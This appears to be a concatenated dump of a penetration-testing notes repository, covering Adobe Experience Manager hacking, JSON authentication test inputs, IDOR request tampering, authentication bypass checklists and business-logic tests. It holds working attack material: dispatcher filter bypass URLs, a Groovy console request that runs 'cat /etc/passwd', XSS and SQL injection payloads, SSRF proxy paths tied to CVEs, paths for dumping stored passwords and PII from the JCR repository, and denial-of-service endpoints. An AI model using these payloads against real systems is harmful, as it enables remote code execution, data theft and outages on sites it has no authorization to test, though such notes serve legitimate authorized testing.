1 | ##### video
2 | https://www.youtube.com/watch?v=EQNBQCQMouk
3 | ##### method
4 | - collect sub domain
5 | - use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem
6 | - Python3 ./aem_hacker.py –u https://example — host localhost
7 | - use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path
8 |
9 | ##### aem tools
10 | - https://github.com/0ang3el/aem-hacker
11 | - https://github.com/0ang3el/aem-rce-bundle
12 | ```
13 | python3 aem_hacker.py -u --host yourvpshostname =>comman usage
14 | python3 aem_discovery.py --file urls.txt --workers 150 =>discover url
15 | python3 aem_enum.py --url => automate usernames and secrets grabbing
16 | python3 aem_ssrf2rce.py --url --fakaem yourvbs
17 | python3 aem_server.py
18 |
19 | ```
20 |
21 | ##### aem dispatcher bypasses
22 | [ ] bypassing cve 2016-0957
23 | ```
24 | https://aemsite/bin/querybuilder.json => blocked
25 | https://aemsite/bin/querybuilder.json/a.css => allow
26 | https://aemsite/bin/querybuilder.json/a.html => allow
27 | https://aemsite/bin/querybuilder.json/a.ico => allow
28 | https://aemsite/bin/querybuilder.json/a.png => allow
29 | https://aemsite/bin/querybuilder.json;%0aa.css => allow
30 | https://aemsite/bin/querybuilder.json/a.1.json => allow
31 |
32 | ```
33 |
34 | [ ] bypassing for interesting servlets
35 | ```
36 | https://aemsite/bin/querybuilder.json => blocked
37 | https://aemsite/bin/querybuilder.json/a.css => block
38 | https://aemsite/bin/querybuilder.json;%0aa.css => block
39 | https://aemsite/bin/querybuilder.json.servlet.css => allow
40 | https://aemsite/bin/querybuilder.json.servlet.html => allow
41 | https://aemsite/bin/querybuilder.json.servlet.ico => allow
42 | https://aemsite/bin/querybuilder.json.servlet.png => allow
43 | ///etc.json instead of /etc.json
44 | ///bin///quesrybuilder.json instead of /bin/quesrybuilder.json
45 | ```
46 | [ ] using ssrf
47 | ```
48 | ssrf should allow to send GET request and see response
49 | - Opensocial proxy
50 | - ssrf in reportingservicesproxyservlet(cve-2018-12809)
51 | ```
52 |
53 | [ ] rce via exposed Groovy console
54 | ```
55 | POST /bin/groovyconsole/post.servlet HTTP/1.1
56 | HOST:
57 |
58 |
59 |
60 |
61 |
62 |
63 | script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt
64 |
65 | ```
66 |
67 | [ ] xss
68 | ```
69 | POST //////content/usergenerated/etc/commerce/smartlists/vv.json
70 |
71 |
72 |
73 |
74 |
75 |
76 | aa=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b
77 | ```
78 | [ ] xss
79 | ```
80 | POST /content/usergenerated/etc/commerce/smartlists/xss
81 |
82 |
83 |
84 |
85 |
86 |
87 | aaa.html=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b
88 | ```
89 | [ ] xss
90 | ```
91 | POST /content/usergenerated/etc/commerce/smartlists/xssed
92 |
93 |
94 |
95 |
96 |
97 |
98 | jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b&jcr:mimeType=text/html
99 | ```
100 |
101 | [ ] secret from jcr
102 | ```
103 | everything is stored in jcr repository :
104 | - secrets (password ,encryption key , tokens)
105 | - cinfiguration
106 | - pII
107 | - usernames
108 |
109 | ** what to use **
110 | - DefaultGETServlet
111 | - QueryBUilderJsonServlet
112 | - QueryBuilderFeedServlet
113 | - GQLSearch Servlet
114 | - other
115 |
116 | ** DefaultGETServlet **
117 | - Allows to get jsr node with its props
118 | - selectors
119 | - tidy
120 | - infinity
121 | - numeric value:-1,0,1...99999
122 | - formats
123 | - json
124 | - xml
125 | - res
126 |
127 | - https://aem.site/tidy.3.json
128 | / => jcr:root
129 | tidy => selector tidy
130 | 3 => selector depth
131 | json => output format
132 |
133 | - how to grap
134 | - get node names, start from jcr:root :
135 | - /.1.json
136 | - /.ext.json
137 | - /.childrenlist.json
138 | - or guess node names :
139 | - comman names /content, /home, /var, /etc
140 | - Dump props for each child node of jcr:root :
141 | - /etc.json or /etc.s.json or /etc.-1.json
142 |
143 | - what to grap
144 | - interesting nodes
145 | - /etc => may contain secrets (pass,enc,keys)
146 | - /apps/system/config => passwords
147 | - /apps/<smth>/config => passwords
148 | - /var => may contain private pii
149 | - /home => password hashed ,pii
150 | - interesting props-contain aem usernames
151 | - jcr:createdBy
152 | - jcr:lastModifiedBy
153 | - cq:LastModifiedBy
154 | ```
155 | [ ] QueryBuild Servlets
156 | ```
157 | - path
158 | - /bin/querybuilder.json
159 | - /bin/querybuilder.feed.servlet
160 |
161 | - examples of useful searches
162 | - type=nt:file&nodename=*.zip
163 | - path=/home&p.hits-full&p.limit=-1
164 | - hasPermission=jcr:write&path=/content
165 | - hasPermission=jcr:addChild Nodes&path=/content
166 | - hasPermission=jcr:modify Properties&path=/content
167 | - p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000
168 | - path=/etc&path.flat=true&p.nodedepth=0
169 | - path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1
170 | ```
171 |
172 | [ ] exploit SSRF
173 | ```
174 | ssrf via Opensocial proxy
175 | - /libs/opensocial/proxy?container=default&url=http://target
176 | - /libs/shindig/proxy?container=default&url=http://target
177 |
178 | ```
179 |
180 | [ ] ReportingServicesProxyServlet
181 | ```
182 | SSRF via ReportingServicesProxyServlet (CVE-2018-12809)
183 | - /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a
184 | - /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a
185 | - /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret-zzzz&redirect_uri=xxxx&code=e
186 |
187 | SSRF via SiteCatalystServlet
188 | - /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
189 | - /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
190 | ```
191 |
192 | [ ] DOS
193 | ```
194 | - /.ext.infinity.json
195 | - /.ext.infinity.json?tidy=true
196 | - /bin/querybuilder.json?type=nt:base&p.limit=-1
197 | - /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=
198 | - /content.assetsearch.json?query=*&start=0&limit=10&random=123
199 | - /..assetsearch.json?query=*&start=0&limit=10&random=123
200 | - /system/bgservlets/test.json?cycles-999999&interval=0&flushEvery=111111111
201 | ```
202 |
--------------------------------------------------------------------------------
/Api Authentication /Authentication.md:
--------------------------------------------------------------------------------
1 | 97 JSON Tests for for Authentication Endpoints link pdf [link](https://www.linkedin.com/feed/update/urn:li:activity:7097279293608607746/)
2 |
3 | 1. Basic credentials
4 | ```
5 | {
6 | "login": "admin",
7 | "password": "admin"
8 | }
9 | ```
10 |
11 | 2. Empty credentials:
12 | ```
13 | {
14 | "login": "",
15 | "password": ""
16 | }
17 | ```
18 |
19 | 3- Null values:
20 | ```
21 | {
22 | "login": null,
23 | "password": null
24 | }
25 | ```
26 |
27 | 4. Credentials as numbers:
28 | ```
29 | {
30 | "login": 123,
31 | "password": 456
32 | }
33 | ```
34 |
35 | 6. Credentials as booleans:
36 | ```
37 | {
38 | "login": true,
39 | "password": false
40 | }
41 | ```
42 |
43 | 7. Credentials as arrays:
44 | ```
45 | {
46 | "login": ["admin"],
47 | "password": ["password"]
48 | }
49 | ```
50 |
51 | 8. Credentials as objects:
52 | ```
53 | {
54 | "login": {"username": "admin",
55 | "password": {"password": "password"}}
56 | }
57 | ```
58 |
59 | 9. Special characters in credentials:
60 | ```
61 | {
62 | "login": "@dm!n",
63 | "password": "p@ssw0rd#"
64 | }
65 | ```
66 |
67 | 10. SQL Injection:
68 | ```
69 | {
70 | "login": "admin' --",
71 | "password": "password"
72 | }
73 | ```
74 |
75 | 11. HTML tags in credentials:
76 | ```
77 | {
78 | "login": "<h1>admin</h1>",
79 | "password": "ololo-HTML-XSS"
80 | }
81 | ```
82 |
83 | 12. Unicode in credentials:
84 | ```
85 | {
86 | "login": "\u0061\u0064\u006D\u0069\u006E",
87 | "password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064"
88 | }
89 | ```
90 |
91 | 13. Credentials with escape characters:
92 | ```
93 | {
94 | "login": "ad\\nmin",
95 | "password": "pa\\ssword"
96 | }
97 | ```
98 |
99 | 14. Credentials with white space:
100 | ```
101 | {
102 | "login": " ",
103 | "password": " "
104 | }
105 | ```
106 |
107 | 15. Overlong values:
108 | ```
109 | {
110 | "login": "a"*10000,
111 | "password": "b"*10000
112 | }
113 |
114 | ```
115 | 16. Malformed JSON (missing brace):
116 | ```
117 | {
118 | "login": "admin",
119 | "password": "admin"
120 | }
121 | ```
122 |
123 | 17. Malformed JSON (extra comma):
124 | ```
125 | {
126 | "login": "admin",
127 | "password": "admin",
128 | }
129 | ```
130 |
131 | 18. Missing login key:
132 | ```
133 | {
134 | "password": "admin"
135 | }
136 | ```
137 |
138 | 19. Missing password key:
139 | ```
140 | {
141 | "login": "admin"
142 | }
143 | ```
144 |
145 | 20. Swapped key values:
146 | ```
147 | {
148 | "admin": "login",
149 | "password": "password"
150 | }
151 | ```
152 |
153 | 21. Extra keys:
154 | ```
155 | {
156 | "login": "admin",
157 | "password": "admin",
158 | "extra": "extra"
159 | }
160 | ```
161 |
162 | 22. Missing colon:
163 | ```
164 | {
165 | "login" "admin",
166 | "password": "password"
167 | }
168 | ```
169 |
170 | 23. Invalid Boolean as credentials:
171 | ```
172 | {
173 | "login": yes,
174 | "password": no
175 | }
176 | ```
177 |
178 | 25. All keys, no values:
179 | ```
180 | {
181 | "": "",
182 | "": ""
183 | }
184 | ```
185 |
186 | 26. Nested objects:
187 | ```
188 | {
189 | "login": {"innerLogin": "admin",
190 | "password": {"innerPassword": "password"}}
191 | }
192 | ```
193 | 27. Case sensitivity testing:
194 | ```
195 | {
196 | "LOGIN": "admin",
197 | "PASSWORD": "password"
198 | }
199 | ```
200 |
201 | 28. Login as a number, password as a string:
202 | ```
203 | {
204 | "login": 1234,
205 | "password": "password"
206 | }
207 | ```
208 |
209 | 29. Login as a string, password as a number:
210 | ```
211 | {
212 | "login": "admin",
213 | "password": 1234
214 | }
215 | ```
216 |
217 | 30. Repeated keys:
218 | ```
219 | {
220 | "login": "admin",
221 | "login": "user",
222 | "password": "password"
223 | }
224 | ```
225 | 31. Single quotes instead of double:
226 | ```
227 | {
228 | 'login': 'admin',
229 | 'password': 'password'
230 | }
231 | ```
232 | 33. Login and password with only special characters:
233 | ```
234 | {
235 | "login": "@#$%^&*",
236 | "password": "!@#$%^&*"
237 | }
238 | ```
239 | 34. Unicode escape sequence:
240 | ```
241 | {
242 | "login": "\u0041\u0044\u004D\u0049\u004E",
243 | "password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044"
244 | }
245 | ```
246 |
247 | 35. Value as object instead of string:
248 | ```
249 | {
250 | "login": {"$oid":
251 | "507c7f79bcf86cd7994f6c0e"},
252 | "password": "password"}
253 | }
254 | ```
255 |
256 | 37. Nonexistent variables as values:
257 | ```
258 | {
259 | "login": undefined,
260 | "password": undefined
261 | }
262 | ```
263 |
264 | 38. Extra nested objects:
265 | ```
266 | {
267 | "login": "admin",
268 | "password": "password",
269 | "extra": {"key1": "value1",
270 | "key2": "value2"}
271 | }
272 |
273 | ```
274 |
275 | 39. Hexadecimal values:
276 | ```
277 | {
278 | "login": "0x1234",
279 | "password": "0x5678"
280 | }
281 | ```
282 |
283 | 40. Extra symbols after valid JSON:
284 | ```
285 | {
286 | "login": "admin",
287 | "password": "password"}@@@@@@
288 | }
289 | ```
290 |
291 | 41. Only keys, without values:
292 | ```
293 | {
294 | "login":,
295 | "password":
296 | }
297 | ```
298 |
299 | 42. Insertion of control characters:
300 | ```
301 | {
302 | "login": "ad\u0000min",
303 | "password": "pass\u0000word"
304 | }
305 | ```
306 |
307 | 43. Long Unicode Strings:
308 | ```
309 | {
310 | "login": "\u0061"*10000,
311 | "password": "\u0061"*10000
312 | }
313 | ```
314 |
315 | 44. Newline Characters in Strings:
316 | ```
317 | {
318 | "login": "ad\nmin",
319 | "password": "pa\nssword"
320 | }
321 | ```
322 |
323 | 45. Tab Characters in Strings:
324 | ```
325 | {
326 | "login": "ad\tmin",
327 | "password": "pa\tssword"
328 | }
329 | ```
330 |
331 | 46. Test with HTML content in Strings:
332 | ```
333 | {
334 | "login": "<b>admin",
335 | "password": "password"
336 | }
337 | ```
338 |
339 | 47. JSON Injection in Strings:
340 | ```
341 | {
342 | "login": "{\"injection\":\"value\"}",
343 | "password": "password"
344 | }
345 | ```
346 |
347 | 48. Test with XML content in Strings:
348 | ```
349 | {
350 | "login": "admin",
351 | "password": "password"
352 | }
353 | ```
354 |
355 | 49. Combination of Number, Strings, and Special characters:
356 | ```
357 | {
358 | "login": "ad123min!@",
359 | "password": "pa55w0rd!@"
360 | }
361 | ```
362 |
363 | 50. Use of environment variables:
364 | ```
365 | {
366 | "login": "${USER}",
367 | "password": "${PASS}"
368 | }
369 | ```
370 |
371 | 51. Backslashes in Strings:
372 | ```
373 | {
374 | "login": "ad\\min",
375 | "password": "pa\\ssword"
376 | }
377 | ```
378 |
379 | 52. Long strings of special characters:
380 | ```
381 | {
382 | "login": "!@#$%^&*()"*1000,
383 | "password": "!@#$%^&*()"*1000
384 | }
385 | ```
386 |
387 | 53. Empty Key in JSON:
388 | ```
389 | {
390 | "": "admin",
391 | "password": "password"
392 | }
393 | ```
394 |
395 | 55. JSON Injection in Key:
396 | ```
397 | {
398 | "{\"injection\":\"value\"}
399 | ": "admin",
400 | "password": "password"
401 | }
402 | ```
403 |
404 | 56. Quotation marks in strings:
405 | ```
406 | {
407 | "login": "\"admin\"",
408 | "password": "\"password\""
409 | }
410 | ```
411 |
412 | 57. Credentials as nested arrays:
413 | ```
414 | {
415 | "login": [["admin"]],
416 | "password": [["password"]]
417 | }
418 | ```
419 |
420 | 58. Credentials as nested objects:
421 | ```
422 | {
423 | "login": {"username": {"value": "admin",
424 | "password": {"password": {"value":
425 | "password"
426 | }
427 | ```
428 |
429 | 59. Keys as numbers:
430 | ```
431 | {
432 | 123: "admin",
433 | 456: "password"
434 | }
435 | ```
436 |
437 | 60. Testing with greater than and less than signs:
438 | ```
439 | {
440 | "login": "admin>1",
441 | "password": "<password"
442 | }
443 | ```
444 |
445 | 61. Testing with parentheses in credentials:
446 | ```
447 | {
448 | "login": "(admin)",
449 | "password": "(password)"
450 | }
451 | ```
452 |
453 | 62. Credentials containing slashes:
454 | ```
455 | {
456 | "login": "admin/user",
457 | "password": "pass/word"
458 | }
459 | ```
460 |
461 | 63. Credentials containing multiple data types:
462 | ```
463 | {
464 | "login": ["admin",
465 | 123,
466 | true,
467 | null,
468 | {"username": ["admin"],
469 | "password": ["password",
470 | 123,
471 | false,
472 | null,
473 | {"password": "password"]}}
474 | }
475 | ```
476 |
477 | 64. Using escape sequences:
478 | ```
479 | {
480 | "login": "admin\\r\\n\\t",
481 | "password": "password\\r\\n\\t"
482 | }
483 | ```
484 |
485 | 65. Using curly braces in strings:
486 | ```
487 | {
488 | "login": "{admin}",
489 | "password": "{password}"
490 | }
491 | ```
492 |
493 | 66. Using square brackets in strings:
494 | ```
495 | {
496 | "login": "[admin]",
497 | "password": "[password]"
498 | }
499 | ```
500 |
501 | 68. Strings with only special characters:
502 | ```
503 | {
504 | "login": "!@#$%^&*()",
505 | "password": "!@#$%^&*()"
506 | }
507 | ```
508 |
509 | 69. Strings with control characters:
510 | ```
511 | {
512 | "login": "admin\b\f\n\r\t\v\0",
513 | "password": "password\b\f\n\r\t\v\0"
514 | }
515 | ```
516 |
517 | 71. Null characters in strings:
518 | ```
519 | {
520 | "login": "admin\0",
521 | "password": "password\0"
522 | }
523 | ```
524 |
525 | 72. Exponential numbers as strings:
526 | ```
527 | {
528 | "login": "1e5",
529 | "password": "1e10"
530 | }
531 | ```
532 |
533 | 73. Hexadecimal numbers as strings:
534 | ```
535 | {
536 | "login": "0xabc",
537 | "password": "0x123"
538 | }
539 | ```
540 |
541 | 74. Leading zeros in numeric strings:
542 | ```
543 | {
544 | "login": "000123",
545 | "password": "000456"
546 | }
547 | ```
548 |
549 | 75. Multilingual input (here, English and Korean):
550 | ```
551 | {
552 | "login": "admin관리ìž",
553 | "password": "password비밀번호"
554 | }
555 | ```
556 | 76. Extremely long keys:
557 | ```
558 | {
559 | "a"*10000: "admin",
560 | "b"*10000: "password"
561 | }
562 | ```
563 |
564 | 78. Extremely long unicode strings:
565 | ```
566 | {
567 | "login": "\u0061"*10000,
568 | "password": "\u0062"*10000
569 | }
570 | ```
571 |
572 | 79. JSON strings with semicolon:
573 | ```
574 | {
575 | "login": "admin;",
576 | "password": "password;"
577 | }
578 | ```
579 |
580 | 80. JSON strings with backticks:
581 | ```
582 | {
583 | "login": "`admin`",
584 | "password": "`password`"
585 | }
586 | ```
587 |
588 | 81. JSON strings with plus sign:
589 | ```
590 | {
591 | "login": "admin+",
592 | "password": "password+"
593 | }
594 | ```
595 |
596 | 82. JSON strings with equal sign:
597 | ```
598 | {
599 | "login": "admin=",
600 | "password": "password="
601 | }
602 | ```
603 | 83. Strings with Asterisk (*) Symbol:
604 | ```
605 | {
606 | "login": "admin*",
607 | "password": "password*"
608 | }
609 | ```
610 |
611 | 84. JSON containing JavaScript code:
612 | ```
613 | {
614 | "login": "admin<script>alert('hi')</script>",
615 | "password": "password"
616 | }
617 | ```
618 |
619 | 85. Negative numbers as strings:
620 | ```
621 | {
622 | "login": "-123",
623 | "password": "-456"
624 | }
625 | ```
626 |
627 | 86. Values as URLs:
628 | ```
629 | {
630 | "login": "https://admin.com",
631 | "password": "https://password.com"
632 | }
633 | ```
634 |
635 | 87. Strings with email format:
636 | ```
637 | {
638 | "login": "admin@admin.com",
639 | "password": "password@password.com"
640 | }
641 | ```
642 | 88. Strings with IP address format:
643 | ```
644 | {
645 | "login": "192.0.2.0",
646 | "password": "203.0.113.0"
647 | }
648 | ```
649 |
650 | 89. Strings with date format:
651 | ```
652 | {
653 | "login": "2023-08-03",
654 | "password": "2023-08-04"
655 | }
656 | ```
657 |
658 | 90. JSON with exponential values:
659 | ```
660 | {
661 | "login": 1e+30,
662 | "password": 1e+30
663 | }
664 | ```
665 |
666 | 91. JSON with negative exponential values:
667 | ```
668 | {
669 | "login": -1e+30,
670 | "password": -1e+30
671 | }
672 | ```
673 |
674 | 92. Using Zero Width Space (U+200B) in strings:
675 | ```
676 | {
677 | "login": "admin​",
678 | "password": "password​"
679 | }
680 | ```
681 |
682 | 93. Using Zero Width Joiner (U+200D) in strings:
683 | ```
684 | {
685 | "login": "adminâ€",
686 | "password": "passwordâ€"
687 | }
688 | ```
689 |
690 | 94. JSON with extremely large numbers:
691 | ```
692 | {
693 | "login": 12345678901234567890,
694 | "password": 12345678901234567890
695 | }
696 | ```
697 |
698 | 95. Strings with backspace characters:
699 | ```
700 | {
701 | "login": "admin\b",
702 | "password": "password\b"
703 | }
704 | ```
705 |
706 | 96. Test with emoji in strings:
707 | ```
708 | {
709 | "login": "admin😀",
710 | "password": "password😀"
711 | }
712 | ```
713 |
714 | 97. JSON with comments, although they are not officially supported in JSON:
715 | ```
716 | {
717 | /*"login": "admin",
718 | "password": "password"*/
719 | }
720 | ```
721 |
722 | 98. JSON with base64 encoded values:
723 | ```
724 | {
725 | "login": "YWRtaW4=",
726 | "password": "cGFzc3dvcmQ="
727 | }
728 | ```
729 |
730 | 99. Including null byte character (may cause truncation):
731 | ```
732 | {
733 | "login": "admin\0",
734 | "password": "password\0"
735 | }
736 | ```
737 |
738 | 100. JSON with credentials in scientific notation:
739 | ```
740 | {
741 | "login": 1e100,
742 | "password": 1e100
743 | }
744 | ```
745 |
746 | 102. Strings with octal values:
747 | ```
748 | {
749 | "login": "\141\144\155\151\156",
750 | "password":"\160\141\163\163\167\157\162\144"
751 | }
752 | ```
753 | 103. writeup
754 | ```
755 | {
756 | root:{
757 | "username": "admin",
758 | "password":"admin"
759 | }
760 | }
761 | ```
762 |
763 | 104. writeup
764 | ```
765 | basic => username=admin
766 | username[]=admin
767 | username[0]=admin
768 | username=admin&username=admin
769 | delete username=admin
770 |
771 | ```
772 |
--------------------------------------------------------------------------------
/Api Authorization/Authorization.md:
--------------------------------------------------------------------------------
1 | **Predictable ID**
2 | ```bash
3 | GET /api/v1/account/**2222**
4 | Token: UserA_token
5 |
6 | GET /api/v1/account/**3333**
7 | Token: UserA_token
8 | ```
9 |
10 | **ID combo**
11 | ```bash
12 | GET /api/v1/**UserA**/data/2222
13 | Token: UserA_token
14 |
15 | GET /api/v1/**UserB**/data/3333
16 | Token: UserA_token
17 | ```
18 |
19 | **Integer as ID**
20 | ```bash
21 | POST /api/v1/account/
22 | Token: UserA_token
23 | {"Account": 2222 }
24 |
25 |
26 | POST /api/v1/account/
27 | Token: UserA_token
28 | {"Account": [3333]}
29 | ```
30 |
31 | **Email as user ID**
32 | ```bash
33 | POST /api/v1/user/account
34 | Token: UserA_token
35 | {"email": " UserA@email.com"}
36 |
37 |
38 | POST /api/v1/user/account
39 | Token: UserA_token
40 | {"email": " UserB@email.com"}
41 | ```
42 |
43 | **Group ID**
44 | ```bash
45 | GET /api/v1/group/CompanyA
46 | Token: UserA_token
47 |
48 | GET /api/v1/group/CompanyB
49 | Token: UserA_token
50 | ```
51 |
52 | **Group and user combo**
53 | ```bash
54 | POST /api/v1/group/CompanyA
55 | Token: UserA_token
56 | {"email": " userA@CompanyA .com"}
57 |
58 | POST /api/v1/group/CompanyB
59 | Token: UserA_token
60 | {"email": " userB@CompanyB .com"}
61 | ```
62 |
63 | **Nested object**
64 | ```bash
65 | POST /api/v1/user/checking
66 | Token: UserA_token
67 | {"Account": 2222 }
68 |
69 | POST /api/v1/user/checking
70 | Token: UserA_token
71 | {"Account": {"Account" :3333}}
72 | ```
73 |
74 | **Multiple objects**
75 | ```bash
76 | POST /api/v1/user/checking
77 | Token: UserA_token
78 | {"Account": 2222 }
79 |
80 | POST /api/v1/user/checking
81 | Token: UserA_token
82 | {"Account": 2222, "Account": 3333, "Account": 5555 }
83 | ```
84 |
85 | **Predictable token**
86 | ```bash
87 | POST /api/v1/user/account
88 | Token: UserA_token
89 | {"data": "DflK1df7jSdfa1acaa"}
90 |
91 | POST /api/v1/user/account
92 | Token: UserA_token
93 | {"data": "DflK1df7jSdfa2dfaa"}
94 | ```
95 |
96 | 10-method
97 | ```bash
98 | POST /api/v1/user/checking
99 | Token: UserA_token
100 | {"Account": 2222 }
101 |
102 | POST /api/v1/user/checking
103 | Token: UserA_token
104 | {"Account": 2222%0d%0a1111 }
105 | ```
106 |
107 | 11-method
108 | ```bash
109 | POST /api/v1/user/checking
110 | Token: UserA_token
111 | {"Account": 2222 }
112 |
113 | POST /api/v1/user/checking
114 | Token: UserA_token
115 | {"Account": 2222%0a1111 }
116 | ```
117 |
118 | 12-method
119 | ```bash
120 | POST /api/v1/user/checking
121 | Token: UserA_token
122 | {"Account": 2222 }
123 |
124 | POST /api/v1/user/checking
125 | Token: UserA_token
126 | {"Account": 2222%0d1111 }
127 | ```
128 |
129 | 13-method
130 | ```bash
131 | POST /api/v1/user/checking
132 | Token: UserA_token
133 | {"Account": 2222 }
134 |
135 | POST /api/v1/user/checking
136 | Token: UserA_token
137 | {"Account": 2222%001111 }
138 | ```
139 |
140 | 14-method
141 | ```bash
142 | POST /api/v1/user/checking
143 | Token: UserA_token
144 | {"Account": 2222 }
145 |
146 | POST /api/v1/user/checking
147 | Token: UserA_token
148 | {"Account": [2222,1111] }
149 | ```
150 |
151 |
152 | 15-method
153 | ```bash
154 | POST /api/v1/user/checking
155 | Token: UserA_token
156 | {"Account": 2222 }
157 |
158 | POST /api/v1/user/checking
159 | Token: UserA_token
160 | {"Account": 2222;1111 }
161 | ```
162 |
163 |
164 | 16-method
165 | ```bash
166 | POST /api/v1/user/checking
167 | Token: UserA_token
168 | {"Account": 2222 }
169 |
170 | POST /api/v1/user/checking
171 | Token: UserA_token
172 | {"Account": 2222,1111 }
173 | ```
174 |
175 | 17-method
176 | ```bash
177 | POST /api/v1/user/checking
178 | Token: UserA_token
179 | {"Account": 2222 }
180 |
181 | POST /api/v1/user/checking
182 | Token: UserA_token
183 | {"Account": 2222|1111 }
184 | ```
185 |
186 | 18-method
187 | ```bash
188 | POST /api/v1/user/checking
189 | Token: UserA_token
190 | {"Account": 2222 }
191 |
192 | POST /api/v1/user/checking
193 | Token: UserA_token
194 | {"Account": 2222%0a%0dcc:1111 }
195 | ```
196 |
197 | 19-method
198 | ```bash
199 | POST /api/v1/user/checking
200 | Token: UserA_token
201 | {"Account": 2222 }
202 |
203 | POST /api/v1/user/checking
204 | Token: UserA_token
205 | {"Account": 2222&1111 }
206 | ```
207 |
208 | 20-method
209 | ```bash
210 | POST /api/v1/user/checking
211 | Token: UserA_token
212 | {"Account": 2222 }
213 |
214 | POST /api/v1/user/checking
215 | Token: UserA_token
216 | {"Account": 2222#%1111 }
217 | ```
218 |
--------------------------------------------------------------------------------
/Authentication/authentication.md:
--------------------------------------------------------------------------------
1 | ## Authentication Bypass
2 | [ ]
3 | ```
4 | 1. Check if post authentication URLs are directly accessible and do not have any session bound to it.
5 | 2. In case the URL is stolen/guessable/brute-forceable, it can lead to account takeover.
6 | ```
7 |
8 | [ ] CAPTCHA Bypass - X-Forwarded-For
9 | ```
10 | 1. Bypass the CAPTCHA check by injecting a random value into the **X-Forwarded-For header
11 | ```
12 |
13 | [ ] Lack of Password Confirmation
14 | ```
15 | Test if password confirmation is necessary with these actions:
16 | - Change Email Address
17 | - Change Password
18 | - Delete Account
19 | - Manage 2FA
20 | ```
21 |
22 | [ ] Lack of Verification Email
23 | ```
24 | 1. Check that during the registration process, an email verification is necessary
25 | ```
26 |
27 |
28 | [ ] No Rate Limiting on a Form
29 | ```
30 | 1. Send a form and intercept the request with Burp proxy
31 | 2. Send the request to intruder
32 | 3. Repeat sending the same request 20-30 times
33 | 4. Observe that all of these forms are sent without any restrictions
34 | ```
35 |
36 |
37 | [ ] No Rate Limiting or Captcha on Login Page
38 | ```
39 | 1. Go to login page and send the unsuccessful login attempt request to Burp Intruder
40 | 2. Change the password values for brute force as random values
41 | 3. Observe that the response to the 20 or 30th request doesn't change and the account is not locked.
42 | ```
43 |
44 | [ ] Username Email Address Enumeration
45 | ```
46 | 1. Go to password reset/login/register or any other area that allows writing username or email address input
47 | 2. Write an existing username/email address with wrong password to observe error message
48 | 3. Write a non-existing username/email address to observe error message
49 | 4. See if error message leaks the information of the existence of username/email addresses
50 | ```
51 |
52 | [ ] Weak Password Policy
53 | ```
54 | 1. Change password to only numerical
55 | 2. Change password to only lower case
56 | 3. Change password to common passwords
57 | 4. Change password to short passwords
58 | 5. Observe that the application has weak or no password policy
59 | ```
60 |
61 | [ ] Weak Registration Implementation over HTTP
62 | ```
63 | 1. Intercept the request during the registration to the application via Burp
64 | 2. Observe that registration request is sent over HTTP
65 | ```
66 |
67 | [ ] secure data transport
68 | ```
69 | 1. search on login page
70 | 2. Send a form and intercept the request with Burp proxy
71 | 3. intercept the request with wireshark
72 | 4. make sure that the data transport is encryption or not
73 | ```
74 |
75 | [ ] Username enumeration
76 | ```
77 | 1. Status codes
78 | 2. Error messages
79 | 3. Response times
80 | X-Forwarded-For:
81 | ```
82 |
83 | [ ] Broken Authentication Session Token Bug
84 | ```
85 | 1. Create a courier account or use existing one.
86 | 2. Confirm Your email address.
87 | 3. Now log out from your account and request for password reset code for your account .
88 | 4. Don't use the code that has been sent to your email address.
89 | 5. In new tab or new browser log in back to your account.
90 | 6. Go to account setting and change your password .
91 | 7. Now go to email and check the password reset code that we requested in step 3.
92 | 8. Change Your password using that reset password code .
93 | 9. You can see that your password has been changed.
94 | ```
95 |
96 | [ ] Broken Authentication and Session Management
97 | ```
98 | 1. Create a Phabricator account having email address "a@x.com".
99 | 2. Now Logout and ask for password reset link. Don't use the password reset link sent to your mail address.
100 | 3. Login using the same password back and update your email address to "b@x.com" and verify the same. Remove "a@x.com".
101 | 4. Now logout and use the password reset link which was mailed to "a@x.com" in step 2.
102 | 5. Password will be changed.
103 | ```
104 |
105 |
106 |
--------------------------------------------------------------------------------
/Bussiness Logic/bussiness logic.md:
--------------------------------------------------------------------------------
1 | 1. change the price with other price :100->50
2 | 2. change the price with nagative price :100->-100
3 | 3. change the price with other price by add nagative value: 100 ->(+-120)
4 | 4. change the price with other price by mult by 0.5: 100->(0.5*100)
5 | 5. Retrieving a Profile
6 | ```
7 | For example, Jack’s profile can be fetched with id=1001 and if this value
8 | changed to 1089 we get another user’s information. A scanner may go on and
9 | change the value from 1001 to **‘1001** to find SQL injection, but not to 1089 and
10 | would miss deducing that the application is vulnerable to authorization bypass. By changing the “id” from 1001 to 1089, a pen tester can see that John’s profile , rather than Jack’s, is being displayed.
11 | ```
12 |
13 | 6. Shopping Cart
14 | ```
15 | Let us consider an online store application where customers add items to their shopping cart. The application sends the customers to a secure payment gateway where they submit their order. To complete the order, customers are required to make a credit card payment. In this shopping cart application, business logic errors
16 | may make it possible for attackers to bypass the authentication processes to
17 | directly log into the shopping cart application and avoid paying for “purchased” items.
18 | ```
19 |
20 | 7. **Review Functionality**
21 | - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
22 | - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
23 | - Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions.
